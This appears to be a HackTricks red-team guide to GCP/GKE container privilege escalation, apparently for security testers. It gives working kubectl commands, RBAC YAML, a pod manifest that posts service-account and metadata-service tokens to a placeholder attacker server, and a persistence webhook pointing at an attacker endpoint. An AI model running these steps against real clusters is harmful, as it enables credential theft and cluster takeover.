GCP - Container Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

container

container.clusters.get

This permission allows you to gather credentials for the Kubernetes cluster using something like:

gcloud container clusters get-credentials <cluster_name> --zone <zone>

Without extra permissions the credentials are pretty basic, as you can just list some resources, but they are still useful to find misconfigurations in the environment.
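For instance, once the credentials have been loaded into your kubeconfig, you can quickly enumerate what they actually let you do (plain kubectl usage, nothing else assumed):

```shell
# List every action the obtained credentials are allowed to perform
kubectl auth can-i --list

# Try some basic enumeration to spot misconfigurations
kubectl get pods --all-namespaces
kubectl get namespaces
```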

Note that Kubernetes clusters might be configured to be private, which will disallow access to the Kube-API server from the Internet.

If you don't have this permission you can still access the cluster, but you need to create your own kubectl config file with the cluster's info. A newly generated one looks like this:

apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    server: https://34.123.141.28
  name: gke_security-devbox_us-central1_autopilot-cluster-1
contexts:
- context:
    cluster: gke_security-devbox_us-central1_autopilot-cluster-1
    user: gke_security-devbox_us-central1_autopilot-cluster-1
  name: gke_security-devbox_us-central1_autopilot-cluster-1
current-context: gke_security-devbox_us-central1_autopilot-cluster-1
kind: Config
preferences: {}
users:
- name: gke_security-devbox_us-central1_autopilot-cluster-1
  user:
    auth-provider:
      config:
        access-token: <access token>
        cmd-args: config config-helper --format=json
        cmd-path: gcloud
        expiry: "2022-12-06T01:13:11Z"
        expiry-key: '{.credential.token_expiry}'
        token-key: '{.credential.access_token}'
      name: gcp
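Note that the auth-provider section above simply shells out to gcloud, so if you can run gcloud as the compromised principal you can fill in the `<access token>` and expiry fields yourself:

```shell
# Same helper the kubeconfig invokes; the token is under .credential.access_token
# and the expiry under .credential.token_expiry (matching the token-key/expiry-key paths)
gcloud config config-helper --format=json

# Or just print the access token directly
gcloud auth print-access-token
```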

container.roles.escalate | container.clusterRoles.escalate

Kubernetes by default prevents principals from creating or updating Roles and ClusterRoles with more permissions than the principal itself has. However, a GCP principal with these permissions will be able to create/update Roles/ClusterRoles with more permissions than the ones it holds, effectively bypassing the Kubernetes protection against this behaviour.

Note that container.roles.create and/or container.roles.update (for Roles), or container.clusterRoles.create and/or container.clusterRoles.update (for ClusterRoles), are also necessary to perform those privilege escalation actions.
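As a sketch (the role name is an arbitrary placeholder), a principal with container.clusterRoles.create plus container.clusterRoles.escalate could push a ClusterRole far more powerful than its own permissions:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: pwned-role   # hypothetical name
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
```

Applying this with a native K8s identity holding fewer permissions would normally be rejected by the RBAC escalation check; the GCP-side permission is what lets it through. You would still need a bind-type permission to attach the role to a principal you control.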

container.roles.bind | container.clusterRoles.bind

Kubernetes by default prevents principals from creating or updating RoleBindings and ClusterRoleBindings that grant more permissions than the principal itself has. However, a GCP principal with these permissions will be able to create/update RoleBindings/ClusterRoleBindings granting more permissions than the ones it holds, effectively bypassing the Kubernetes protection against this behaviour.

Note that container.roleBindings.create and/or container.roleBindings.update (for RoleBindings), or container.clusterRoleBindings.create and/or container.clusterRoleBindings.update (for ClusterRoleBindings), are also necessary to perform those privilege escalation actions.
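For example (the binding name and target SA are placeholders), a ClusterRoleBinding that grants cluster-admin to a service account you control:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: pwned-binding   # hypothetical name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: default        # hypothetical: an SA whose token you can obtain
  namespace: default
```

Again, Kubernetes would normally block a principal from binding a role it doesn't already hold; the GCP bind permission bypasses that check.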

container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update

All these permissions allow you to create or update a resource that defines a pod. In a pod definition you can specify the SA that will be attached and the image that will be run, so you can run an image that exfiltrates the token of the SA to your server, allowing you to escalate to any service account. For more information check:

As you are in a GCP environment, you will also be able to get the node pool's GCP SA from the metadata service and escalate privileges in GCP (by default the Compute Engine default SA is used).
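A minimal sketch of such a pod (the SA name and the attacker URL are placeholders) that leaks both the mounted K8s SA token and the node pool's GCP SA token:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: token-exfil          # hypothetical name
spec:
  serviceAccountName: <target_sa>   # the K8s SA you want to escalate to
  containers:
  - name: exfil
    image: curlimages/curl
    command: ["sh", "-c"]
    args:
    - |
      # K8s SA token automatically mounted in the pod
      curl -s -X POST https://<attacker_server>/k8s \
        -d @/var/run/secrets/kubernetes.io/serviceaccount/token
      # Node pool's GCP SA access token from the metadata service
      curl -s -H "Metadata-Flavor: Google" \
        "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
        | curl -s -X POST https://<attacker_server>/gcp -d @-
```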

container.secrets.get | container.secrets.list

As explained in this page, with these permissions you can read the tokens of all the SAs of kubernetes, so you can escalate to them.
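For example, on clusters where SA token Secrets exist, you could list them and decode a token directly:

```shell
# Enumerate secrets in every namespace
kubectl get secrets --all-namespaces

# Extract and decode a service account token from a chosen secret
kubectl get secret <secret_name> -n <namespace> \
  -o jsonpath='{.data.token}' | base64 -d
```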

container.pods.exec

With this permission you will be able to exec into pods, which gives you access to all the Kubernetes SAs running in pods so you can escalate privileges within K8s; moreover, you will also be able to steal the GCP Service Account of the node pool, escalating privileges in GCP.
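For instance:

```shell
# Get a shell inside a pod
kubectl exec -it <pod_name> -n <namespace> -- /bin/sh

# From inside the pod: the K8s SA token attached to the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# From inside the pod (if the metadata service is reachable):
# the node pool's GCP SA access token
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```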

container.pods.portForward

As explained in this page, with these permissions you can access local services running in pods that might allow you to escalate privileges in Kubernetes (and in GCP if somehow you manage to talk to the metadata service).
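For example, if a pod exposes an internal-only service on port 8080 (hypothetical port and pod name), you could reach it from your machine:

```shell
# Forward the pod's port 8080 to localhost:4444
kubectl port-forward pod/<pod_name> -n <namespace> 4444:8080

# Then interact with the internal service locally
curl http://localhost:4444/
```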

container.serviceAccounts.createToken

Judging by the name of the permission, it looks like it will allow you to generate tokens of the K8s Service Accounts, so you would be able to privesc to any SA inside Kubernetes. However, I couldn't find any API endpoint that uses it, so let me know if you find one.

container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update

These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to persist in the cluster. For more information follow this link.
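A sketch of a malicious webhook (all names and URLs are placeholders) that sends every pod creation to an attacker-controlled endpoint, which can then mutate the pod spec at will, e.g. injecting a sidecar container:

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: persist-webhook          # hypothetical name
webhooks:
- name: inject.attacker.example  # hypothetical attacker endpoint
  clientConfig:
    url: https://<attacker_server>/mutate
    caBundle: <base64_CA_cert>   # CA that signed the attacker server's TLS cert
  rules:
  - operations: ["CREATE"]
    apiGroups: [""]
    apiVersions: ["v1"]
    resources: ["pods"]
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Ignore          # don't break the cluster if the endpoint is down
```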

